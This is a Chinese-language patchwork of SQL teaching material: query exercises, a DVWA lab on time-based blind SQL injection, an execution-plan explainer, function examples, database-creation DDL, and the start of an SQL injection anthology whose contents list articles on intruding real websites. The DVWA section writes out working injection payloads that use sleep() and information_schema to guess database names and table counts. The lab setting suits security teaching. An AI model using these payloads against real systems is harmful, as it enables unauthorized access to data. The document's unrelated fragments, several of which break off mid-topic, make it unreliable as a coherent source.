第十三讲 SQL实战

实验一 SQL编程一．实验目的1.熟练掌握SQL编程方法2.掌握Transact-SQL基本语法3.掌握SQL-查询分析器的基本用法4.掌握SQL中常用统计函数的用法5.掌握游标的基本用法二．实验要求1.回顾SQL语法2.熟悉SQL Server2000的基本操作3.预习Transact-SQL基本语法4.预习游标用法三．实验内容1.用统计函数sum、avg、min、max、count等进行查询2.统计函数结合group by进行查询3.实现Transact-SQL中的判断和循环结构编程4.用游标实现一个统计功能四．实验内容要求实验任务1、给学生表增加字段联系电话，为整型2、改变学生表中字段联系电话字段的属性为字符型3、删除联系电话字段4、删除表教师表5、查询学生表中年龄>20并且是北京来的学生6、查询各专业学生的人数7、查询英语成绩大于80分的所有女生8、查询每个专业的女生人数9、对各个地区来的学生的总人数按从小到大的顺序排列10、求各个专业女生数学的平均分11、求计算机专业的所有李姓的学生12、用case语句查出若水同学的各门课程的成绩，并按照90以上为优秀80-90为良好；60-80中等，60以下为不及格13、用插入语句向学生表插入一条记录要求只插入学号，姓名，地址三个字段的值，1008，德华，香港14、重新创建一个表结构与学生表相同命名为学生表1，用SQL语句将学生表中的所有女生，插入到学生表1中15、取出学生表中备份字段的前20个字符16、求出年龄大于平均年龄的女生姓名17、求出数学课程的成绩最高最低分18、求出各专业英语大于80分学生的人数19、用IN语句实现找出英语不及格的学生学号和姓名20 、查出所有学生及其课程成绩，不管该学生有没有选课实验二表连接及综合查询一、实验目的与要求1．掌握表连接查询的使用方法2．掌握子查询的使用方法3．能使用内连接、左外连接、右外连接以及交叉连接解决相关问题4．熟悉系统函数的使用5．能熟练应用SELECT语句及其相关字句6．能将SELECT与系统函数、IF ELSE、WHILE等语句进行综合应用并解决相关问题二、实验内容（一）连接查询(数据库及表见附件)1．查找每一个供应商供应的商品的名称，要求显示供应商名称和商品名称。

实训SQL注入（时间盲注）1一、实训目的1. 了解SQL注入的常用方式2. 掌握SQL时间盲注的方法二、实训环境1. DVWA平台2. Firefox浏览器（谷歌浏览器）三、实训内容1. 配置DVWA平台进入DVWA平台，选择DVWA Security，将安全级别设置为Low。

2. 测试SQL注入点（1）点击SQL Injection（Blind），进入测试页面。

（2）使用参数1' and sleep(5) #进行提交，页面明显延迟。

使用参数1 and sleep(5) #进行提交，页面没有延迟。

说明是基于字符的时间盲注。

（3）猜解数据库名的长度。

具体命令如下：•1' and if(length(database())=1,sleep(5),1) # //没有延迟•…………•1' and if(length(database())=4,sleep(5),1) # //明显延迟（4）二分法猜解数据库名。

具体命令如下：•1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)# //明显延迟•……•1' and if(ascii(substr(database(),1,1))<100,sleep(5),1)# //没有延迟•1' and if(ascii(substr(database(),1,1))>100,sleep(5),1)# //没有延迟修改substr函数的第二个参数，如substr(database(),2,1)进行测试，可以获得数据库的第二个字母。

（5）猜解数据库表的数量。

具体命令如下：•1' and if((select count(table_name) from information_schema.tables wheretable_schema=database() )=1,sleep(5),1)# //没有延迟•1' and if((select count(table_name) from information_schema.tables wheretable_schema=database() )=2,sleep(5),1)# //明显延迟（6）猜解数据库表名的长度。

sql执行计划案例咱来个简单又好玩的SQL执行计划案例哈。

想象你有个超级大的图书馆数据库，里面有好多表，就像图书馆有好多书架一样。

比如说有个“书籍表”，里面存着每本书的信息，像书名、作者、出版年份啥的；还有个“借阅记录表”，记录谁借走了哪本书。

现在你想找出来哪本书被借得最多次。

那SQL语句可能就像这样：SELECT 书籍表.书名, COUNT(借阅记录表.书籍编号) AS 借阅次数。

FROM 书籍表。

JOIN 借阅记录表 ON 书籍表.书籍编号 = 借阅记录表.书籍编号。

GROUP BY 书籍表.书名。

ORDER BY 借阅次数 DESC。

LIMIT 1;那这个SQL的执行计划是啥样的呢？首先啊，数据库管理系统看到你要做 `JOIN`（连接）操作，就像要把两个书架上的信息匹配起来。

它得先决定从哪个表开始找比较快呢。

一般来说，如果“借阅记录表”比较小，就从它开始。

为啥呢？就好比你要找一个在两个大堆东西里都有的小零件，从比较小的那堆开始找会快一些嘛。

然后呢，它会按照 `书籍编号` 这个“桥梁”，把“书籍表”和“借阅记录表”对应起来。

这个过程就像是把两堆卡片按照相同的数字连起来一样。

接着，它要做 `GROUP BY`（分组）操作啦。

这就好比把所有的书按照书名分成不同的小组，然后在每个小组里数有多少个借阅记录。

这时候数据库系统可能会创建一些临时的小空间来存放每个小组的计数结果。

再之后，就是 `ORDER BY`（排序）啦。

它得把这些小组按照借阅次数从多到少排好队，就像把小朋友按照身高从高到低排队一样。

最后呢， `LIMIT 1` 就是只取排在最前面的那一个，也就是被借得最多次的那本书。

你看，这样一解释，这个SQL执行计划是不是就像一个小流程一样，很容易理解啦？。

SQL函数使用大全及示例使用方法汇总在SQL中，函数是一种操作数据的工具，能够将特定的操作应用于查询结果或表的列。

函数可以用于处理数据、执行计算和生成结果。

下面是一些常用的SQL函数及其示例使用方法：1.字符串函数：-CONCAT：将两个字符串连接在一起。

示例：SELECT CONCAT(first_name, ' ', last_name) AS full_name FROM employees;-SUBSTRING：返回一个字符串的子字符串。

示例：SELECT SUBSTRING(address, 1, 10) AS address FROM customers;-LENGTH：返回一个字符串的长度。

示例：SELECT LENGTH(product_name) AS name_length FROM products;2.数值函数：-SUM：计算一组数值的总和。

示例：SELECT SUM(price) AS total_price FROM orders;-AVG：计算一组数值的平均值。

示例：SELECT AVG(age) AS average_age FROM employees;-MAX：返回一组数值的最大值。

示例：SELECT MAX(salary) AS max_salary FROM employees;3.日期和时间函数：-NOW：返回当前日期和时间。

-DATE_FORMAT：格式化日期和时间。

示例：SELECT DATE_FORMAT(order_date, '%Y-%m-%d') AS formatted_date FROM orders;-DATEDIFF：计算两个日期之间的天数差。

示例：SELECT DATEDIFF('2024-01-01', '2024-01-01') AS days_diff;4.条件函数：-IF：根据条件返回不同的值。

数据库实验总汇二、使用SQL Server 工具在管理数据库系统和运行SQL查询的两个主要工具是企业管理器和查询分析器三、实验目的1．熟悉数据库的交互式SQL工具。

2．熟悉通过SQL对数据库进行操作。

3．完成上机练习。

四、实验内容(打※为选做题)Part A1．使用CREATE语句创建数据库2. 使用CREATE语句创建基本表3．更改基本表的定义，增加列，修改列的数据类型。

4．创建表的索引，取消表的索引1、数据库的建立使用SQL 语句建立关系数据库schooldemo2、基本表的建立在数据库schooldemo下，使用SQL 语句建立关系数据库表：人员表PERSON（Pno，Pname, Page）,房间表ROOM（Rno,Rname,Rarea）,表PR(Pno,Rno,Date).其中，表PERSON ：Pno（CHAR（8），主码，非空，唯一），Pname（CHAR（20），非空），Page（INT）；表ROOM：Rno（CHAR（8），主码，非空，唯一），Rname（CHAR（20）），Rarea（FLOAT （10））；表PR：Pno（CHAR（8），非空，唯一），Rno（CHAR（8），非空，唯一），Date （DATETIME）；（三个表之间有联系）3、更改基本表的定义，增加列，删除列，修改列的数据类型。

更改表PERSON，增加属性Ptype（类型是CHAR ，长度为10），把表ROOM中的属性Rname的数据类型改为长度为40。

4、创建表的索引，取消表的索引为ROOM表创建按Rno降序排列的索引创建PERSON表按Pname升序排列的唯一性索引取消PERSON表Pname升序索引5、删除表ROOM实验过程(1.a)1、数据库的建立使用SQL 语句建立关系数据库schooldemocreate database schooldemoon(name=schooldemo,filename='e:\123\school_data.mdf',size=5mb,maxsize=15mb,filegrowth=10%)log on(name=schooldemo_log,filename='e:\123\schooldemo.ldf',size=5mb,maxsize=15mb,filegrowth=4mb)2、基本表的建立在数据库schooldemo下，使用SQL 语句建立关系数据库表：人员表PERSON（Pno，Pname, Page）,房间表ROOM（Rno,Rname,Rarea）, 表PR(Pno,Rno,Date).其中，表PERSON ：Pno（CHAR（8），主码，非空，唯一），Pname（CHAR（20），非空），Page（INT）；表ROOM：Rno（CHAR（8），主码，非空，唯一），Rname（CHAR（20）），Rarea（FLOAT（10））；表PR：Pno（CHAR（8），非空，唯一），Rno（CHAR（8），非空，唯一），Date（DATETIME）；（三个表之间有联系）create table person(pno char (8)primary key,pname char (20),page int);create table room(rno char (8) primary key,rname char(20),rarea float(10));create table pr(pno char (8),rno char (8),date datetime,primary key(pno,rno),foreign key(pno) references person(pno),foreign key(rno) references room(rno));3、更改基本表的定义，增加列，删除列，修改列的数据类型。

SQL注入全接触1.SQL注入漏洞全接触--入门篇 (1)2.SQL注入法攻击一日通 (8)3.SQL Server应用程序中的高级SQL注入 (19)4.编写通用的ASP防SQL注入攻击程序 (22)5.利用instr()函数防止SQL注入攻击 (23)6.跨站式SQL注入技巧 (25)7. 防范Sql注入式攻击 (27)8.PHP与SQL注入攻击 (29)9.SQL注入攻击零距离 (30)10.SQL注入技术和跨站脚本攻击的检测 (34)11.菜鸟入门级：SQL注入攻击 (39)12. SQL注入渗透某网络安全公司的网站全过程 (42)13.利用SQL注入2分钟入侵网站全程实录 (45)1.SQL注入漏洞全接触--入门篇随着B/S模式应用开发的发展，使用这种模式编写应用程序的程序员也越来越多。

但是由于这个行业的入门门槛不高，程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。

用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据，这就是所谓的SQL Injection，即SQL注入。

SQL注入是从正常的WWW端口访问，而且表面看起来跟一般的Web页面访问没什么区别，所以目前市面的防火墙都不会对SQL注入发出警报，如果管理员没查看IIS日志的习惯，可能被入侵很长时间都不会发觉。

但是，SQL注入的手法相当灵活，在注入的时候会碰到很多意外的情况。

能不能根据具体情况进行分析，构造巧妙的SQL语句，从而成功获取想要的数据，是高手与“菜鸟”的根本区别。

根据国情，国内的网站用ASP+Access或SQLServer的占70%以上，PHP+MySQ占L20%，其他的不足10%。

在本文，我们从分入门、进阶至高级讲解一下ASP注入的方法及技巧，PHP注入的文章由NB联盟的另一位朋友zwell撰写，希望对安全工作者和程序员都有用处。